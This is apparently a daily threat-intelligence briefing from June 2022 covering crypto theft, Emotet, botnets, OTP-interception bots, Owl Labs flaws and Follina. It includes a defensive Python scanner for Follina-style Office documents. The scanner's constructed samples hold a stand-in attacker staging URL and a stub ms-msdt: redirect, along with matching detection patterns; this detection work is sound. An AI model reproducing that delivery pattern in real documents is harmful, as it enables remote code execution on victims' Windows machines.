Cyware Daily Threat Intelligence

Daily Threat Briefing • Jun 9, 2022
Owl Labs released a firmware update for its existing devices that addresses a high-severity bug. The bug lets an attacker abuse the devices' Wi-Fi access point tethering mode, turning a targeted device into a rogue wireless access point and passing network traffic through it. Meanwhile, Follina remains a weak point for Microsoft users as more malware operators join the bandwagon and abuse the flaw.
In the last 24 hours, the threat landscape also saw an ongoing large-scale phishing scam aimed at millions of Facebook users. Active since September 2021, it has earned its operators millions of dollars.
Over a hundred million dollars stolen
The Maiar Exchange, a decentralized exchange on the Elrond blockchain, was breached and 1.65 million EGLD tokens (an estimated $113 million) were drained from three different wallets. The exchange was taken offline for a short period after the attack. According to sources, most of the stolen funds have either been recovered or will be covered by the Elrond Foundation.
Zero-click attacks against Ukrainian officials?
Ukraine's State Special Communications Service confirmed that threat actors are attempting to hijack the phones of the country's public servants. The attackers are reportedly distributing malware in what appears to be a zero-click attack, one that needs no interaction from the victim. A spokesperson said that, so far, no mobile devices are known to have been compromised.
New Emotet module harvests Chrome card data
Proofpoint spotted a new series of attacks involving the infamous Emotet botnet. The new build carries a module that steals credit card information saved in the Chrome browser. Proofpoint observed the campaign between April 4 and 19. The email subjects used by the attackers were plain, single-word lures such as 'Salary.'
Botnets target Linux-based Atlassian servers
Linux servers running unpatched Atlassian Confluence Server and Data Center are being targeted by multiple botnet operators, namely Kinsing, Hezb, and Dark.IoT. The three groups are known for infiltrating vulnerable Linux servers to deploy backdoors and cryptominers. Since PoC exploits were published, security researchers have observed almost a ten-fold increase in active exploitation; patching (or taking unpatched instances off the internet) is the only reliable defense.
Bypassing 2FA by intercepting OTPs
Cyble exposed bot-based caller ID spoofing techniques that cybercriminals use to bypass 2FA and steal users' one-time passwords (OTPs). Most of the interception services observed are operated through Telegram and Discord bots: the bot calls the victim while spoofing the number of a bank or service, persuades them to read back or enter the OTP they have just received, and relays it to the operator. Once the OTP reaches the bot operators, they can log in to the victim's account on the targeted service. Any OTP delivered over SMS or voice is exposed to this attack; only phishing-resistant factors such as hardware security keys bind the login to the legitimate site.
Owl Labs patches severe flaw
Video conferencing company Owl Labs has fixed a severe bug affecting its Meeting Owl Pro and Whiteboard Owl devices. An attacker within Bluetooth range can abuse the bug to turn a device into a rogue access point. Security researchers at Modzero discovered five vulnerabilities in Owl's devices in total; the remaining flaws will be resolved in future updates.
AsyncRAT meets Follina
Follina, the recently disclosed Windows vulnerability tracked as CVE-2022-30190, is being abused by several malware families, including AsyncRAT. The flaw lies in the Microsoft Support Diagnostic Tool (MSDT) and affects all supported versions of Windows. No patch is available yet; for now only Microsoft's advisory and its workarounds, chiefly disabling the MSDT URL protocol handler, mitigate the vulnerability.
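The briefing only names the flaw, so as an added example (not code from Cyware or from any of the vendors mentioned) here is a small triage check a responder can run over quarantined Office documents. It relies on the publicly reported delivery pattern for Follina: the document carries a relationship with TargetMode="External" that loads an attacker-hosted HTML page, and that page (or, in some variants, an embedded part) invokes the ms-msdt: URI scheme. The script unpacks an OOXML file, flags every external relationship in any .rels part, and greps every part for the ms-msdt: scheme. The sample documents, the hostname stage.example.invalid, and the stub ms-msdt: string are all constructed for the demonstration.

```python
"""Triage check for Follina-style Office documents (constructed example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_ooxml(data: bytes) -> list:
    """Return (part name, reason) findings for an OOXML document given as bytes.

    Check 1: every *.rels part is parsed and any relationship with
             TargetMode="External" is reported (e.g. an oleObject that loads
             from a URL, which a benign document rarely needs).
    Check 2: every part is searched for the ms-msdt: scheme itself.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(content)
                except ET.ParseError:
                    findings.append((name, "unparseable relationships part"))
                    continue
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode", "").lower() == "external":
                        kind = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings.append(
                            (name, f"external {kind} -> {rel.get('Target')}"))
            if MSDT_RE.search(content):
                findings.append((name, "ms-msdt: URI present"))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_ooxml(data))


def build_docx(rels: str, parts: dict) -> bytes:
    """Assemble a minimal constructed .docx (a zip) for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
        for part_name, body in parts.items():
            zf.writestr(part_name, body)
    return buf.getvalue()


REL_HEAD = f'<Relationships xmlns="{REL_NS}">'
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed benign sample: a single internal relationship to styles.xml.
BENIGN_DOCX = build_docx(
    REL_HEAD + f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" '
    'Target="styles.xml"/></Relationships>',
    {"word/styles.xml": "<w:styles/>"},
)

# Constructed suspicious sample: an oleObject relationship that loads a
# remote HTML page from a hypothetical host (the Follina staging pattern).
SUSPICIOUS_DOCX = build_docx(
    REL_HEAD + f'<Relationship Id="rId5" Type="{OFFICE_REL}oleObject" '
    'Target="http://stage.example.invalid/payload.html!" TargetMode="External"/>'
    "</Relationships>",
    {},
)

# Constructed sample where an embedded part carries the scheme directly
# (arguments deliberately omitted; only the scheme matters for detection).
MSDT_IN_PART_DOCX = build_docx(
    REL_HEAD + "</Relationships>",
    {"word/embeddings/x.html": '<script>location.href="ms-msdt:/id ...";</script>'},
)

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_DOCX), ("external-rel", SUSPICIOUS_DOCX),
                       ("msdt-in-part", MSDT_IN_PART_DOCX)]:
        print(label, scan_ooxml(doc))
```

Run it against a directory of quarantined .docx files by reading each one into bytes and calling scan_ooxml; an empty list means neither indicator is present. Treat a hit on the external relationship check as a lead rather than proof: legitimate templates occasionally link to remote resources, so confirm by fetching the target in a sandbox and looking for the ms-msdt: scheme there.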
Malvertising pushes fake Firefox update
Malwarebytes uncovered a malvertising campaign that leads to a fake Firefox update. Researchers noted that the malvertising infrastructure is essentially the same one that has been in use since late 2019. The campaign stood out because, in some cases, the operators appeared to taunt the very ad networks they were abusing, naming their malvertising gates after those or other ad networks.
Multi-million-dollar ad scam hits Facebook
Researchers at PIXM laid bare a massive phishing scam that abused Facebook and Messenger to trick millions of users into entering their account credentials, then funneled them through advertisement-laden pages that earned the operators revenue. Although Facebook had preventive measures in place to curb the spread of phishing URLs, the cybercriminals were able to bypass these protections.